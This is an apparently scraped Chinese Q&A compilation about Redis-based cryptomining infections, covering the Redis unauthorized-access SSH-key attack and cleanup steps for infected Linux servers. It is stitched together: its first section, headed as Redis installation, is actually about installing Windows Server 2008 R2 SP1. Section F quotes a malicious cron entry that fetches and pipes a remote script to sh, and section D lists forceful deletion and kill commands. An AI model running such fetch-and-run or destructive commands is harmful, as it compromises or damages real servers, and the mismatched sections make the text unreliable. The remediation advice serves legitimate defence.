redis挖矿病毒

A. 如何在Windows Server 2008 R2 SP1安装Redis

使用具有管理员权限的账户进行更新
安装某些程序或更新可能需要在管理员账户下才能正常安装，其他的账户可能限制了安装的程序或更新。至于怎么用管理员权限的账户登录计算机呢？【首先右击计算机，打开的菜单选“管理”命令，在左侧控制台树窗口单击“本地用户和组”栏下的“用户”，在右边窗格我们可以看到名称为“administrator”的账户，这个就是管理员账户，双击打开，将“账户已禁用”的勾去掉，并单击“确定”按钮。这样就启用了管理员账户。】
退出所有正在运行的第三方程序
在安装sp1前，应将所有第三方程序退出，以防程序在执行操作过程干扰了sp1的安装。
禁用病毒防护软件
在安装sp1过程中，病毒防护软件可能会拦截更新程序，特别是第三方病毒防护软件。另外，病毒防护软件因为需要实时扫描系统的文件，因而也会影响到安装的速度。
卸载已经安装过的
sp1
测试版或预发行版
在安装正式版的sp1前，先把测试版或预发行版卸载掉，不然在安装正式版的时候，可能会提示“系统已安装sp1”之类的现象。
安装
kb976902
补丁包
kb976902是安装
sp1
的先决条件，所以在安装sp1前先安装kb976902
补丁包能避免意想不到的问题【下载地址在参考资料中】
安装系统更新就绪工具
系统更新就绪工具有助于解决可能阻止
windows更新和
service
pack
安装的问题。例如，如果某个已破坏的系统文件阻止某个更新识别在您的计算机上运行的
windows的版本，则可能无法安装该更新。（本段文字来源于微软官方网站）【下载地址在参考资料中】
使用
chkdsk
命令检查磁盘
以管理员身份运行“命令提示符（cmd）”，并执行“chkdsk
c:
/f”命令对磁盘进行扫描和修复。【c指系统所在分区的盘符】
使用
sfc
命令检查和修复系统文件
以管理员身份运行“命令提示符（cmd）”，并执行“sfc
/scannow”命令扫描所有受保护的系统文件并用正确的
microsoft
版本替换不正确的版本。
9
以上操作，基本能有效解决sp1安装失败的问题。但如果是“service
pack
安装无法继续”或“缺少
service
pack
需要的一个或多个系统组件”诸如此类的错误消息，那么可能您在之前使用过第三方优化软件将系统中与sp1关联的系统组件给删除了。

B. redis漏洞 可以入侵windows吗

Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。

C. 中挖矿病毒的表现

故障现象：使用过程中，发现经常有服务无故关闭，登录服务器经检查，发现CPU使用率达到100%。在检测异常进程中，未发现CPU使用率异常的进程（使用 top、htop 以及 ps -aux 进行检查），于是报障。

检测过程：

1.找到他shell脚本对应目录把目录或者文件删除。

2.检查定时任务是否存在挖矿木马文件在定时任务中，避免定时运行挖矿木马文件。

3.添加hosts挖矿病毒访问对应网站，避免二次访问并下载。

4.排查liunx命令是否损坏，如损坏下载"procps-3.2.8"并编译，恢复top等系列命令。

5.检测进程是否异常。

6.排查入侵入口，例如 redis是否存在弱口令，nginx或者apache上面的网站程序是否存在漏洞，并排查下nginx或者apache日志审查漏洞所在处。

7.排查ssh登录日志。

8.把ssh登录切换成秘钥登录。

9.重启服务器，检查是否进程是否正常。

D. .如果一台linux服务器中了botnet病毒,该如何排查

1、病毒木马排查。
1.1、使用netstat查看网络连接，分析是否有可疑发送行为，如有则停止。
在服务器上发现一个大写的CRONTAB命令，然后进行命令清理及计划任务排查。
(linux常见木马，清理命令chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd; chattr -i /usr/bin/.swhd; rm -f /usr/bin/.swhd; rm -f -r /usr/bin/bsd-port; cp /usr/bin/dpkgd/ps /bin/ps; cp /usr/bin/dpkgd/netstat /bin/netstat; cp /usr/bin/dpkgd/lsof /usr/sbin/lsof; cp /usr/bin/dpkgd/ss /usr/sbin/ss;rm -r -f /root/.ssh; rm -r -f /usr/bin/bsd-port;find /proc/ -name exe | xargs ls -l | grep -v task |grep deleted| awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9;）
1.2、使用杀毒软件进行病毒查杀。
2、服务器漏洞排查并修复
2.1、查看服务器账号是否有异常，如有则停止删除掉。
2.2、查看服务器是否有异地登录情况，如有则修改密码为强密码（字每+数字+特殊符号）大小写，10位及以上。
2.3、查看Jenkins、Tomcat、PhpMyadmin、WDCP、Weblogic后台密码，提高密码强度（字每+数字+特殊符号）大小写，10位及以上。
2.4、查看WEB应用是否有漏洞，如struts, ElasticSearch等，如有则请升级。
2.5、查看MySQL、SQLServer、FTP、WEB管理后台等其它有设置密码的地方，提高密码强度（字每+数字+特殊符号）大小写，10位及以上。
2.6、查看Redis无密码可远程写入文件漏洞，检查/root/.ssh/下黑客创建的SSH登录密钥文件，删除掉，修改Redis为有密码访问并使用强密码，不需要公网访问最好bind 127.0.0.1本地访问。
2.7、如果有安装第三方软件，请按官网指引进行修复。

E. 如何用Linux服务器挖矿教程

今天早上起来一看，服务器脚本一个都没有启动!甚是奇怪，远程登录服务器，也是异常的卡，直到最后卡死，只好重新启动服务器!
启动之后没一会又会变卡，越来越卡，top查看进程！不觉又奇怪的进程，因为平常也不经常看！所以自己也搞不明白怎么回事儿！只好到群里问了问，说是被挖矿的挂了木马文件了，是由于redis的漏洞!
后来我自己发现，原来redis远程可以直接登录，原以为redis和mysql不开放登录权限就不会支持远程登录呢，看来是我想多了
看了好长时间才发现一个异常的进程，自启的进程 molibe ！
找到进程位置 ps -ef|grep molibe ;
在tmp目录下，打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下，cat root 查看定时器的执行发现之前脚本都被改了，顾不得删除cron，service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了！但是根本是因为redis漏洞，所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)

F. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

G. 怎样知道有redis未授权访问

Redis因配置不当可以导致未授权访问，被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式，在特定条件下，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器，可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生，严重危害业务正常服务。